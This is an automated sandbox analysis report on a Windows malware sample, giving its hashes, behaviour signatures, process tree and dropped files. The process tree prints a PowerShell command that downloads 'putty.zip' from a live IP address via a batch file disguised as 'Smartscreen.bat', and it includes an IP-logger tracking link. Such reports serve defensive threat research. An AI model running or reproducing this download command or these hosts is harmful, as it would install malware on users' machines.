Analysis

  • max time kernel
    134s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 19:39

General

  • Target

    66a5a529386533e25316942993772042.exe

  • Size

    5.9MB

  • MD5

    66a5a529386533e25316942993772042

  • SHA1

    053d0d7f4cb6e3952e849f02bbfbdb4d39021146

  • SHA256

    713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94

  • SHA512

    9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

  • SSDEEP

    98304:6QqmVoQ/tUAh8ggYJCHtEFy3X1mDyV/w4qp/tkC9+yZ+KZ8dSHLNejiRuO+4GiW:6QqmVo481z1mYbWSCeKhxqr7h

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://94.103.188.126/jerry/putty.zip

Signatures

  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe
    "C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2136
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/26uSj6
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2544 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2588

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    713c138415a38d7f128e37616d8dd614

    SHA1

    23950ebffa92ce09c0399abea9f4f6ab3847d063

    SHA256

    c6e512dbee002303c011d14756a1214ab31960695430ba93d6e31768e5521d36

    SHA512

    abba5c1a7cd79d9dcda007927ce8a349c9d3aebaf7f90265578725a9ad80aecfc2564bffdef1f5ddbed25aa4a6300d05ba0a37ceb08aae8bb4b9f659034399e2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    76b545e52e328fcdfdbc9bcc7fb2340b

    SHA1

    f303ed55cd2c0bcc14325fbe43bcb0bce2a4d572

    SHA256

    4c8b33300c3c169e041ca8a1113de9683e65547a855dc8cb33795ab6cca2e2d7

    SHA512

    fc26243389cd7e017fe64be9e8f7e4f423e42740154b4c7ee76790d474336b30e970b9bb538929cfac9c0beb079ad47233af9a820bb4f1f2d48e44770eb6b913

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f0a469058c339f62c9330e50563e9544

    SHA1

    f92307f713e954a62598e93e274533bcbc96dc7a

    SHA256

    832eda9f63388c28b794d33fdedf6425ee38aaecfd29d4371463fb67cc6c7015

    SHA512

    7bd2fc69282cf16d531376c085c4ddfece9cf5860c54923779d5ce8dd31fcec31a99a48e6e901df4197a426f80d33a28e55372240feac6fd4fc7b68e3014f648

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fd26c6f9566456f4b411df04ff4ad4b3

    SHA1

    b5807ef44ca0c7e1aca3317a4bf66923de85ce86

    SHA256

    33b57a84d8949dfab1bc0fb285f93dcb97391f746104f527e3eb4f07e8226ab6

    SHA512

    21a2cade00c4213a933a0908d961e406f797fd735ee2eb0361a8f7abb07af45c5b54718a3abd6e767bad0cb736926c5bb3140c5eb5d08d1ec202963e136637c7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a375549ad248c6887131476d88405ff4

    SHA1

    7d0312a6420a7534065bcbf8b1c85cdd4dd7709f

    SHA256

    9261846fab83d77e305bb2c1aa36a5172865783416976345b5b7ae1f70287b0c

    SHA512

    347b5f733a138f931132d62f8d090879902e2f25c4a55195d096abdeee692b9b68607c319ff80030e7d3506e42d408613dafe8e6519c91ffba7540c2bcf6ba93

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    0f894db4d56388bb872232675b8ae038

    SHA1

    260579e805fa5bde78d78f90e71071cf14be0791

    SHA256

    c97441450c2b3d181403a209ecc9743f19fd5f7525e93f642745a41d030dafff

    SHA512

    72a0bbb30640ec9faffd03fd5383d0bcabf429da277b1efb5c908edff3e1c5c4ae6a850001823905a0013663da9ee58009ba870b0ccd24f20c705e0167acf602

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    feb9e0858c9429c50c0cff9310c85f71

    SHA1

    0d26ba605d05d420e10214acd0e437d31a65049a

    SHA256

    d51f6f7f61213df6d9f341126dea6cb4216395bc04ba3b53ab44147cb2e4c30a

    SHA512

    eaebc07043a0306e9e96548a56383c3ef3668310b7fedd6c809cb47afc43629ebb01ee177a1962bb45228800dea6990b8ad0bf0244f3ea29c87f69b12c8957c5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    0f4735dc6a65f92bc50d0638b60a12fa

    SHA1

    396e5d1cd477268c83e375b6dc628d647b0dec50

    SHA256

    7c0fa10d4ea4b8a74b7b5dcd9d5ce195d5235f97c1967de3910b5208d182b428

    SHA512

    7063cc1cc9dac6276cc80731a26c7b2986348f10acc0e3db8dcf4ecf58a7dca0d91c54c5f4249ccdd8d2c68f03ea7e55c4109c01692264b6309aa5c75ab864f9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    25cdf44cae644d58889d78de7cd4359c

    SHA1

    7ce651902d83198d25cb353c30810c2c8b3dceb9

    SHA256

    4f39b03932799c441bfcb07828bbe596523c75f271b227b63d78687562a85d23

    SHA512

    dd4958a1526dbe9e74281a309cda9e7ea0e539e4948d6b1856f213caa9ad1c348fca95808b8197009e0f124d73a9fc9f88425afc7f0b9f9946da114d4cd92e31

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c233bd7ac41f59c08e56ab77bd8b341f

    SHA1

    54d5a892f32c6e5a526de4bf9439c6b783c853df

    SHA256

    87f23f3e9744cc7a8f378618a4a0fba8adef1642a37c505e885e179f2211f87b

    SHA512

    81737b11bf36a6e9f0c32cadde1d721b6ca85eb67297643cc3fabc4b37560647e80427a8b5d710f99da078befa85a09a678bf10e340ffbf9a22ce79141a2b29a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    48317cee49264264747f4420ae569dda

    SHA1

    0e65b7520980d7f24c302c08468d75f39758b985

    SHA256

    ec3972a9cd6fee9d643d3f0c5c3b80764a452be8efd8d7d8cd03ef7084184941

    SHA512

    a6aca135bb47fad4438771b9b32435575e6603707126ad69aee6f4f1fe820766615c689979c530ab6a8d8e3b4e80b55401960a66cba00dd9cc3e1e56af34b92b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fcbc9e4be29db3668a6633b382d24188

    SHA1

    f69fe77767cde973227e970c5562f688113837a4

    SHA256

    59bc61270e88ea351d4500c6dd52b56a32a37120093a313ed214d94e90d98dbe

    SHA512

    a7507ce8227f0bd6558a87e97f2839d852fd3dca08a747899b64bb8c1efecfbc6b2f570ffa423774e44ad77d3df3c3ee09e0eeacbc5e8de02b04d00664733bfc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ab5356aaea867668a4be08ef11084930

    SHA1

    0bb799b84e9721679d98b47498c1a552e962151a

    SHA256

    7c6c1932de6f7d7f3c75f8816e2c471d9997f7fbc8d9ff8b4224af808dfef469

    SHA512

    f827d9258534328a93cfa0f256a0015fd56caf612ab2ab9a7e2f678e0f85c3dcd277d2ced3a06478a48282f1d37a7af4802a1ea29190d01b720ffcbd50480a44

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f14a1156a8fb8e6d4ce20a7354ff8e32

    SHA1

    a2d9a401d53f77a88376b2bbb98f12f089f75958

    SHA256

    ddd49f56ec230d2e4ea8c00e8cb846addb8c5a0e37d49c2c87fd3d9dbf7ef729

    SHA512

    406d28c9e11afc33e9613b337a899a65115b17c427642cb4ec0cf7650e26f205ab624545fbb4e54c65229a1df5d02dd795511676e53ef80bc9cd43699f1c4ce1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f82b151c4fbcce31e07ecf71c0fed9c4

    SHA1

    56705dd93b85f0d0ab52e74403d44cab4086c255

    SHA256

    62012bbfb7bda32f1c9d244f9e111647ec28875340bbf4633c12929b65f8b8ed

    SHA512

    bb3f16f28fa4ee052740c62dc991f1ae3a39b415422b1214d5ebce12936bbe5f06f815b3f8887c63eb19d457ee29f6879db9d9207e1a55ef34b690021e6a96cc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c23180d12687be6291746ed8ee79fd6a

    SHA1

    3c337a1b7a8d74c02052282ae0d5cbeef14952b9

    SHA256

    2918919570326878d2fd29aec739546f6c6e5a10f59c917894e3b8e5a41796ff

    SHA512

    79822109a0debca97071c69c304d3b64e0de33adeedc6ee3006aedc399849823d1383c41fd048a7bb5e4b27c812de848de2bbc45abc7cf608c3c7cc647c8928c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    57fdd3b8efb93bcbd7929b7b14a1a951

    SHA1

    6fe744a009d3ed3a99d90446f99cb67575c55e21

    SHA256

    07c43dab4f50304d278242840e713d3e631b414d546bd77f980ba34460ff6e90

    SHA512

    1c06a9e85f51359dfea3c4bf59f287fb7ae0a176a315a0ebafeded7d0d515ee8021ad005d118b76fd1161bdc30fd6335f55e1634fd4aed7b405bde02ffcfa930

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    14dd16c93cac418b4a6e5aa2eca697f6

    SHA1

    7aa4a2b31b9b98812971241b0ec69b59c85f3124

    SHA256

    d6affb3fc14d593df7f99d3591346bd8afeccd42eeb1f4b06f4cd58a1dc42a1b

    SHA512

    7b281ebe5fd49343782e2d6ffc6be4a5a72da4d6932db5f356b0df0037259bb7061f3e46acfcf1e63f562532cc7d3df1c6c385b775790c355539eb98a2554c4e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    97ecbfebac1536b3179012c1c6e85e18

    SHA1

    36a53b340efdffabec61f88ec66bc1114462b69f

    SHA256

    229b0a943b6c69c4f617adf07557e1347b982710ab0997f0f1ad1f0da08156c6

    SHA512

    eae2c93c799a3f7b14fa5e13947b002fbaf3fa3363b0bf3df231ffeb02f17add321766d69279ef7e65fd9cb811d4f783ad34a0145d1946dce84808f8748c1784

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8be513fec78b33bf102eec50792c73d4

    SHA1

    2661230077d195e29777f8fbb10bb7a0f36b6cdf

    SHA256

    de92295cb28cbe27e89239b39ae71a259ae3793675a60f109bf14a008963c7ab

    SHA512

    1b7c1927409bb4ae1c362669918047ee2c9b5e94b41afff73354d2033687b86a77d96a342fc4f4160db7ec5558b5854aec34ab33c79245a7109096ef4e8b95d0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    d1de26efda825f1a697fb79fd71a6d43

    SHA1

    8f951887bcce9e6b621447befc20e6beeccd2ed1

    SHA256

    aee01f2ad359189e8ce7d4833113d04963254d5b2c8cef78ba57e8f0784ac78d

    SHA512

    b4794b00610584c7f64922e7e9f90e96bd59e73d0ac49e17119780f02ca51959f5e43461a99e1f95fd939c6dc2b2848898a2a1542a5a9aeba8548ea3413d91e4

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\6y0a2v0\imagestore.dat

    Filesize

    5KB

    MD5

    e6651792ed445d0a589266a988f62fa4

    SHA1

    7a2f64fcf62ee66f98785446f971dd368aa64862

    SHA256

    08013f3c541a527fe606db9a0b6ab6ba8a3bd66d1f48a01be02949e9b4a8bd0c

    SHA512

    eb41b4b9e64d7a996f970d3a2124c10858a03c2182c7fff498a4df23b4391494f75c9e089ad73a207ceff3f5feeb99acb31ad44775876f77b28ce86eccec2840

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IW68H88T\favicon[2].ico

    Filesize

    5KB

    MD5

    f3418a443e7d841097c714d69ec4bcb8

    SHA1

    49263695f6b0cdd72f45cf1b775e660fdc36c606

    SHA256

    6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

    SHA512

    82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

  • C:\Users\Admin\AppData\Local\Temp\Cab5CA2.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar5CA5.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\Tar5D67.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

    Filesize

    238B

    MD5

    f6423b02fa9b2de5b162826b26c0dc56

    SHA1

    01e7e79e6018c629ca11bc30f15a1a3e6988773e

    SHA256

    59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83

    SHA512

    5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

  • \Users\Admin\AppData\Local\Temp\nsy1AA3.tmp\UAC.dll

    Filesize

    14KB

    MD5

    adb29e6b186daa765dc750128649b63d

    SHA1

    160cbdc4cb0ac2c142d361df138c537aa7e708c9

    SHA256

    2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08

    SHA512

    b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

  • \Users\Admin\AppData\Local\Temp\nsy1AA3.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    132e6153717a7f9710dcea4536f364cd

    SHA1

    e39bc82c7602e6dd0797115c2bd12e872a5fb2ab

    SHA256

    d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2

    SHA512

    9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1